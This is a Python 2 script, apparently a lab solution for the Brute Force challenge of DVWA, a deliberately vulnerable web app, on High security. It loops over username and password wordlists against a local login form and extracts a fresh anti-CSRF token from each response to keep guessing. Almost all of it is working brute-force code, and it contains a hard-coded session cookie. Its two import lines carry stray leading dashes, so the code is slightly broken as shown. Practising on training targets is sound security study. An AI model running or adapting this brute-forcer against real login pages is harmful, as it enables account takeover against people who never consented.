############################################################################################################################################################################################################################
# DVWA Brute Force High: CSRF Token
#
# Solution to the Brute Force section on High Security: brute-forces the password, extracting the CSRF token
# from each served page to use in the next guess.
#
############################################################################################################################################################################################################################
- import httplib
- import re
# The login form embeds a hidden anti-CSRF field, for example:
#   <input type="hidden" name="user_token" value="b59fc306cc2b62fc89667c2f42122e1f">
# (illustrative only - the search pattern used further down expects the
# attributes single-quoted, so confirm the exact markup against the live page).

# Request template for one login attempt; the ^...^ markers are filled in per try.
request = "/dvwa/vulnerabilities/brute/index.php?username=^USER^&password=^PASS^&Login=Login&user_token=^USERTOKEN^"

# Text DVWA returns in the page body when a login attempt is rejected.
failtext = "Username and/or password incorrect."

# Cookie header sent with every request: the DVWA security level plus the
# PHP session id. NOTE: the session id is a live, pasted-in credential and the
# script only works while that exact session is still valid.
cookies = "security=high; PHPSESSID=6ek9h8fph3mtr8lunrpoa0jq06"

# Wordlists, one candidate per line. Raw strings keep the Windows backslashes
# literal - the same value the non-raw literals yield on Python 2, where \U,
# \A, \D and \p are not escape sequences.
usersfile = r'C:\Users\Administrator\Desktop\user.txt'
passwordfile = r'C:\Users\Administrator\Desktop\pass.txt'
# Load both wordlists up front. Entries keep their trailing newline here and
# are stripped at the point of use.
with open(usersfile) as f:
    usernames = list(f)
with open(passwordfile) as f:
    passwords = list(f)
# Anti-CSRF field as DVWA emits it (single-quoted attributes); group 1 is the token.
csrf_pattern = "<input type='hidden' name='user_token' value='(.*?)' />"


def _fetch(path):
    """GET *path* on the local DVWA host with the session cookie; return the body.

    A fresh connection is opened for every request and, as in the original
    flow, never closed explicitly.
    """
    conn = httplib.HTTPConnection("127.0.0.1")
    conn.request("GET", path, "", {"Cookie": cookies})
    return conn.getresponse().read()


def _token_from(page):
    """Return the user_token value embedded in *page*.

    Raises AttributeError when the hidden field is absent (re.search yields
    None), which aborts the whole run - presumably the case once the
    session behind the cookie is no longer valid; confirm against the app.
    """
    return re.search(csrf_pattern, page).group(1)


def _login_path(user, candidate, token):
    """Fill the ^USER^/^PASS^/^USERTOKEN^ markers of the request template."""
    filled = request.replace("^USER^", user)
    return filled.replace("^PASS^", candidate).replace("^USERTOKEN^", token)


for username in usernames:
    username = username.strip()
    # Each attempt must carry the token from the previously served page, so
    # bootstrap with a plain GET of the form.
    user_token = _token_from(_fetch("/dvwa/vulnerabilities/brute/index.php"))
    print "Working on user ", username
    print "INITIAL CSRF TOKEN :", user_token
    for password in passwords:
        password = password.strip()
        path = _login_path(username, password, user_token)
        data = _fetch(path)
        if failtext not in data:
            print "Found correct password:", username, password
            break
        # Rejected: the response page carries the token for the next attempt.
        user_token = _token_from(data)